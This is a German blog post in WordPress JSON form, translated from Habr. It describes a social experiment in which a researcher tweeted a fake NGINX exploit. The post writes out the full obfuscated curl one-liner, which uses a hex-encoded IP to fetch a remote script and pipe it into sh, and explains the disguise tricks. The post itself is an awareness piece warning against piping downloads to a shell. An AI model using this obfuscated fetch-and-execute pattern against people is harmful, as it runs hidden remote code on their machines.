{"id":35126,"date":"2019-10-31T22:02:28","date_gmt":"2019-10-31T19:02:28","guid":{"rendered":"https:\/\/prohoster.info\/blog\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\/"},"modified":"2019-10-31T22:02:28","modified_gmt":"2019-10-31T19:02:28","slug":"uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","title":{"rendered":"Erfolg des sozialen Experiments mit einem gef\u00e4lschten Exploit f\u00fcr nginx","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><i><b>Anmerkung des \u00dcbersetzers.<\/b>: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\">Autor<\/a><\/noindex> In seiner urspr\u00fcnglichen Anmerkung, ver\u00f6ffentlicht am 1. Juni, entschloss sich, ein Experiment in der Gruppe von Interessierten an Informationssicherheit durchzuf\u00fchren. Zu diesem Zweck bereitete er einen gef\u00e4lschten Exploit f\u00fcr eine nicht offengelegte Schwachstelle im Webserver vor und ver\u00f6ffentlichte ihn auf seinem Twitter. Seine Vermutungen \u2014 sofort von Fachleuten enttarnt zu werden, die den offensichtlichen Betrug im Code sehen w\u00fcrden \u2014 bewahrheiteten sich nicht nur nicht\u2026 Sie \u00fcbertrafen alle Erwartungen, zwar in die entgegengesetzte Richtung: Der Tweet erhielt enorme Unterst\u00fctzung von zahlreichen Menschen, die seinen Inhalt nicht \u00fcberpr\u00fcften.<\/i><\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit einem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/20ff08c6f541176c68ef2c689b989389.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n<b>TL;DR: Verwenden Sie auf keinen Fall das File-Pipelining in sh oder bash. Das ist eine hervorragende M\u00f6glichkeit, die Kontrolle \u00fcber einen Computer zu verlieren.<\/b><noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<p>Ich m\u00f6chte eine kleine Geschichte \u00fcber einen humorvollen PoC-Exploit teilen, der am 31. Mai erstellt wurde. Er erschien umgehend als Antwort auf die Nachricht von <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">Alisa Esage Schewtschenko<\/a><\/noindex>, Mitglied der <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thezdi\">Zero Day Initiative<\/a><\/noindex> (ZDI), dass bald Informationen \u00fcber eine Schwachstelle in NGINX ver\u00f6ffentlicht werden, die zu RCE (Remote Code Execution) f\u00fchrt. Da NGINX die Grundlage vieler Webseiten bildet, sollte die Nachricht wie eine Bombe einschlagen. Aber aufgrund von Verz\u00f6gerungen im Prozess der \u201everantwortungsvollen Offenlegung\u201c waren die Details des Vorfalls nicht bekannt \u2014 dies ist das Standardverfahren der ZDI.<\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit einem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/fba47177ff2a2d05db7942f229e145b0.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\/status\/1134400951043874816\">Tweet<\/a><\/noindex> \u00fcber die Offenlegung der Schwachstelle in NGINX<\/i><\/p>\n<p>Nachdem ich an einer neuen Technik zur Obfuskation in curl gearbeitet hatte, zitierte ich den urspr\u00fcnglichen Tweet und \"leckten den funktionierenden PoC\", der aus einer einzigen Codezeile bestand, die angeblich die entdeckte Schwachstelle ausnutzte. Nat\u00fcrlich war das kompletter Unsinn. Ich dachte, ich w\u00fcrde sofort entlarvt werden, und im besten Fall w\u00fcrde ich ein paar Retweets bekommen (na gut).<\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit einem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/30c8394a4bd7a151828bc3459f18f2f6.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\/status\/1134559331989434368\">Tweet<\/a><\/noindex> mit gef\u00e4lschtem Exploit<\/i><\/p>\n<p>Aber ich konnte mir nicht vorstellen, was als N\u00e4chstes geschah. Die Popularit\u00e4t meines Tweets schoss in die H\u00f6he. Erstaunlicherweise hat bis jetzt (15:00 MSK am 1. Juni) kaum jemand realisiert, dass es ein Fake ist. Viele retweeteten ihn ohne jede \u00dcberpr\u00fcfung (ganz zu schweigen davon, dass sie sich die sch\u00f6ne ASCII-Grafik, die er ausgibt, angesehen haben).<\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit einem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/a22501843edc07cf0dc49b698b1048c2.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Schauen Sie sich nur diese Sch\u00f6nheit an!<\/i><\/p>\n<p>Obwohl all diese Zyklen und Farben bemerkenswert sind, ist es offensichtlich, dass die Menschen den Code auf ihrem eigenen Rechner ausgef\u00fchrt haben, um sie zu sehen. Gl\u00fccklicherweise funktionieren Browser \u00e4hnlich, und in Anbetracht der Tatsache, dass ich keine rechtlichen Probleme brauche, machte der Code, der in meiner Website eingebettet war, lediglich Echo-Aufrufe, ohne zu versuchen, irgendeinen weiteren Code zu installieren oder auszuf\u00fchren.<\/p>\n<p>Ein kleiner Einschub: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/netspooky\">netspooky<\/a><\/noindex>, <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/dnoiz1\">dnz<\/a><\/noindex>, ich und andere Jungs aus dem Team <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thugcrowd\">Thugcrowd<\/a><\/noindex> spielen schon eine Weile mit verschiedenen M\u00f6glichkeiten zur Obfuskation von cURL-Befehlen, weil es Spa\u00df macht\u2026 und wir sind Geeks. netspooky und dnz haben einige neue Methoden entdeckt, die mir \u00e4u\u00dferst vielversprechend erschienen. Ich habe mich dem Spa\u00df angeschlossen und versucht, IP-dezimale Umwandlungen zu dem Trickset hinzuzuf\u00fcgen. Es stellte sich heraus, dass IPs auch in ein hexadezimales Format umgewandelt werden k\u00f6nnen. Dar\u00fcber hinaus \u201efressen\u201c cURL und die meisten anderen NIX-Tools bereitwillig hexadezimale IPs! Daher musste man nur eine \u00fcberzeugende und sicher aussehende Kommandozeile erstellen. Letztendlich entschied ich mich f\u00fcr diese:<\/p>\n<pre><code class=\"plaintext\">curl -gsS https:\/\/127.0.0.1-OR-VICTIM-SERVER:443\/..\/..\/..\/\/nginx-handler?\/usr\/lib\/nginx\/modules\/ngx_stream_module.so:127.0.0.1:80:\/bin\/sh'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc \/dev\/tcp\/localhost<\/code><\/pre>\n<p><\/p>\n<h2>Sozio-elektronische Ingenieurskunst (S.E.E.) \u2013 mehr als nur Phishing<\/h2>\n<p>\nSicherheit und Vertrautheit waren der Hauptbestandteil dieses Experiments. Ich denke, genau das f\u00fchrte zu seinem Erfolg. Die Kommandozeile implizierte eindeutig Sicherheit, indem sie auf \u201e127.0.0.1\u201c (allseits bekannt als localhost) verwies. localhost gilt als sicher und die Daten darauf verlassen nie Ihren Computer.<\/p>\n<p>Vertrautheit war der zweite Schl\u00fcsselkomponenten von S.E.E. des Experiments. Da das Zielpublikum haupts\u00e4chlich aus Menschen bestand, die mit den Grundlagen der Computersicherheit vertraut sind, war es wichtig, den Code so zu gestalten, dass seine Teile bekannt und vertraut (und damit sicher) wirken. Die \u00dcbernahme von Elementen alter Exploit-Konzepte und deren ungew\u00f6hnliche Kombination erwies sich als sehr erfolgreich.<\/p>\n<p>Im Folgenden finden Sie eine detaillierte Analyse des Einzeilers. <i>Alles in dieser Liste hat eine <b>kosmetische Natur<\/b>, und f\u00fcr seine tats\u00e4chliche Funktion ist nahezu nichts erforderlich.<\/i><\/p>\n<p>Welche Komponenten sind wirklich notwendig? Dies sind <code>-gsS<\/code>, <code>-O 0x0238f06a<\/code>, <code>|sh<\/code> und der Webserver selbst. Der Webserver enthielt keine sch\u00e4dlichen Anweisungen, sondern \u00fcbermittelte einfach ASCII-Grafiken mit Hilfe von Befehlen <code>echo<\/code> im Skript, das sich in <code>index.html<\/code>befand. Als der Benutzer eine Zeichenfolge mit <code>|sh<\/code> in der Mitte eingab, <code>index.html<\/code> wurde sie geladen und ausgef\u00fchrt. Gl\u00fccklicherweise hatten die W\u00e4chter des Webservers keine b\u00f6sen Absichten.<\/p>\n<ul>\n<li> <code>..\/..\/..\/%00<\/code> \u2014 stellt einen Verlass auf das Verzeichnis dar;<\/li>\n<li> <code>ngx_stream_module.so<\/code> \u2014 der Pfad zu einem zuf\u00e4lligen NGINX-Modul;<\/li>\n<li> <code>\/bin\/sh%00&lt;'protocol:TCP'<\/code> \u2014 wir starten angeblich <code>\/bin\/sh<\/code> auf der Zielmaschine und leiten die Ausgabe in einen TCP-Kanal um;<\/li>\n<li> <code>-O 0x0238f06a#PLToffset<\/code> \u2014 ein geheimer Bestandteil, erg\u00e4nzt um <code>#PLToffset<\/code>, um wie ein Speicheroffset auszusehen, das in irgendeiner Weise im PLT enthalten ist;<\/li>\n<li> <code>|sh;<\/code> \u2014 ein weiterer wichtiger Teil. Wir mussten die Ausgabe in sh\/bash umleiten, um den Code zu\u6267\u884c, der vom angreifenden Webserver, der \u00fcber die Adresse <code>0x0238f06a<\/code> (<code>2.56.240.x<\/code>);<\/li>\n<li> <code>nc \/dev\/tcp\/localhost<\/code> \u2014 ein Platzhalter, in dem netcat auf verweist, <code>\/dev\/tcp\/localhost<\/code>, damit alles wieder sicher aussieht. Tats\u00e4chlich tut es jedoch nichts und ist nur aus \u00e4sthetischen Gr\u00fcnden in der Zeichenfolge enthalten.<\/li>\n<\/ul>\n<p>\nDamit endet die Entschl\u00fcsselung des Einzeilerskripts und die Diskussion \u00fcber die Aspekte der \"sozio-elektronischen Ingenieurkunst\" (ausgekl\u00fcgeltes Phishing).<\/p>\n<h2>Konfiguration des Webservers und Gegenma\u00dfnahmen<\/h2>\n<p>\nDa die \u00fcberwiegende Mehrheit meiner Abonnenten Informationssicherheitsexperten\/Hacker sind, habe ich beschlossen, den Webserver etwas widerstandsf\u00e4higer gegen \"Interesse\" von ihrer Seite zu machen, einfach damit die Jungs etwas zu tun haben (und es macht Spa\u00df, ihn einzurichten). Ich werde hier nicht alle Fallen auflisten, da das Experiment noch andauert, aber hier sind einige Dinge, die der Server tut:<\/p>\n<ul>\n<li> \u00dcberwacht aktiv Versuche auf bestimmten sozialen Netzwerken und f\u00fcgt verschiedene Vorschaubilder ein, um den Benutzer zu ermutigen, dem Link zu folgen.<\/li>\n<li> Leitet Chrome\/Mozilla\/Safari\/usw. auf einen Werbefilm von Thugcrowd um, anstatt das Shell-Skript anzuzeigen.<\/li>\n<li> Beobachtet EVIDENTE Anzeichen f\u00fcr Eindringen\/brutalen Hack, wonach er anf\u00e4ngt, Anfragen an die NSA-Server umzuleiten (Haha!).<\/li>\n<li> Installiert ein Trojanisches Pferd sowie ein BIOS-Rootkit auf allen Computern, deren Benutzer einen Host mit einem normalen Browser besuchen (Witz!).<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit einem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/8ea3f0c6e2e303bef6f9ba73370d6cf1.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Ein kleiner Teil von Anti-Malware<\/i><\/p>\n<p>In diesem Fall war mein einziges Ziel, einige Funktionen von Apache zu erkunden - insbesondere coole Weiterleitungsregeln - und ich dachte, warum nicht?<\/p>\n<h2>NGINX-Exploit (echt!)<\/h2>\n<p>\nFolgen Sie <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">@alisaesage<\/a><\/noindex> Folgen Sie ZDI auf Twitter und verfolgen Sie ihre beeindruckende Arbeit bei der Behebung echter Schwachstellen und Exploits in NGINX. Ihre Arbeit hat mich immer fasziniert und ich bin Alice dankbar f\u00fcr die Geduld im Umgang mit all den Erw\u00e4hnungen und Benachrichtigungen, die durch meinen dummen Tweet entstanden sind. Gl\u00fccklicherweise hat er auch einen gewissen Nutzen gebracht: Er hat das Bewusstsein f\u00fcr die Schwachstellen in NGINX und die Probleme, die durch den Missbrauch von curl verursacht werden, erh\u00f6ht.<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/flant\/blog\/454700\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":26410,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-35126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Erfolg des sozialen Experiments mit einem falschen Exploit f\u00fcr nginx | ProHoster","description":"z.B.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster","og:description":"\u041f\u0440\u0438\u043c.","og:url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:02:28+00:00","article:modified_time":"2019-10-31T19:02:28+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"35126","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-21 21:57:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 22:59:48","updated":"2026-01-21 21:57:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/35126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=35126"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/35126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media\/26410"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=35126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=35126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=35126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}